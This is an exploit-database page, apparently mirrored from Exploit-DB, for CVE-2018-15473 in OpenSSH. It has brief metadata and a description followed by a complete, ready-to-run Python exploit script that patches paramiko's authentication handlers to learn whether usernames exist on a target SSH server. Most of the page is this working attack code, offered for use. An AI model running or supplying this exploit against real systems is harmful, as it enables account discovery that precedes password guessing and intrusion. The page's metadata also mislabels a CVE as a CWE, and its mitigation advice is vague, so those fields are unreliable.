header-logo
Suggest Exploit
vendor:
N/A
by:
Matthew Daley, Justin Gardner, Lee David Painter
5.3
CVSS
MEDIUM
User Enumeration
200
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: CVE-2018-15473
CPE: N/A
Metasploit: https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2018-15599/https://www.rapid7.com/db/vulnerabilities/debian-cve-2018-15599/https://www.rapid7.com/db/vulnerabilities/openbsd-openssh-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/ibm-aix-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/suse-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/debian-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2018-15473/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2018-15473/
Other Scripts: N/A
Platforms Tested: Linux, Mac, Windows
2018

SSH User Enumeration by Leap Security

This exploit is a python script that uses malicious functions to malform a packet and overwrite the MSG_SERVICE_ACCEPT handler. It then performs authentication with the malicious packet and username to check if the username is valid.

Mitigation:

Ensure that the SSH server is configured to only allow authentication with valid usernames.
Source

Exploit-DB raw data:

#!/usr/bin/env python2
# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) https://leapsecurity.io
# Credits: Matthew Daley, Justin Gardner, Lee David Painter


import argparse, logging, paramiko, socket, sys, os

class InvalidUsername(Exception):
    pass

# malicious function to malform packet
def add_boolean(*args, **kwargs):
    pass

# function that'll be overwritten to malform the packet
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[
        paramiko.common.MSG_SERVICE_ACCEPT]

# malicious function to overwrite MSG_SERVICE_ACCEPT handler
def service_accept(*args, **kwargs):
    paramiko.message.Message.add_boolean = add_boolean
    return old_service_accept(*args, **kwargs)

# call when username was invalid 
def invalid_username(*args, **kwargs):
    raise InvalidUsername()

# assign functions to respective handlers
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username

# perform authentication with malicious packet and username
def check_user(username):
    sock = socket.socket()
    sock.connect((args.target, args.port))
    transport = paramiko.transport.Transport(sock)

    try:
        transport.start_client()
    except paramiko.ssh_exception.SSHException:
        print '[!] Failed to negotiate SSH transport'
        sys.exit(2)

    try:
        transport.auth_publickey(username, paramiko.RSAKey.generate(2048))
    except InvalidUsername:
        print "[-] {} is an invalid username".format(username)
        sys.exit(3)
    except paramiko.ssh_exception.AuthenticationException:
        print "[+] {} is a valid username".format(username)

# remove paramiko logging
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())

parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)')
parser.add_argument('target', help="IP address of the target system")
parser.add_argument('-p', '--port', default=22, help="Set port of SSH service")
parser.add_argument('username', help="Username to check for validity.")

if len(sys.argv) == 1:
    parser.print_help()
    sys.exit(1)

args = parser.parse_args()

check_user(args.username)

Navigation

Suggest Exploit

Services By CQR